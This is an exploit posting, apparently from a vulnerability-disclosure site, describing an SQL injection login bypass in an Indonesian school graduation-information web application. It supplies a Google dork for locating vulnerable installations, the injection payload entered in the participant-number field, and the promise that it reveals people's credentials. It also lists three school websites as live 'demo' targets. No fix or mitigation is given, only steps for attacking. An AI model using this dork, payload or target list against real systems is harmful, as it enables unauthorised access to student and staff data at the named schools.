Aplikasi Sistem Informasi Kelulusan - Bypass SQL Vulnerabilities

2020.09.06

Gh05t666nero (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/index.html intitle:Admin Tokol DistroIT

+------------------------------------------------+
# Exploit Title: Aplikasi Sistem Informasi Kelulusan - Bypass SQL Vulnerabilities
# Google Dork: inurl:/index.html intitle:Admin Tokol DistroIT
# Date: 06/09/2020
# Author: Gh05t666nero
# Team: Indoghostsec
# Tested on: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01)
+------------------------------------------------+
[~] Search the dork in Google
[~] Open target
[~] Enter No Peserta with
[~] No Peserta: nero' or'1=1#
[~] If vulnerable you will see the credentials of a person or several people at once.
+------------------------------------------------+
[~] Demo Site:-
[~] http://www.smpkatolikadisucipto.sch.id/kabarlulus/
[~] http://smk1palembang.sch.id/kelulusanxyz-0a/
[~] http://smapgri1mjl.sch.id/kelulusan/
+------------------------------------------------+

Contact me:- cybernatic@indoghostsec.my.id

References:

Greet'z to all member Indoghostsec

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Aplikasi Sistem Informasi Kelulusan - Bypass SQL Vulnerabilities

Dork: inurl:/index.html intitle:Admin Tokol DistroIT

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.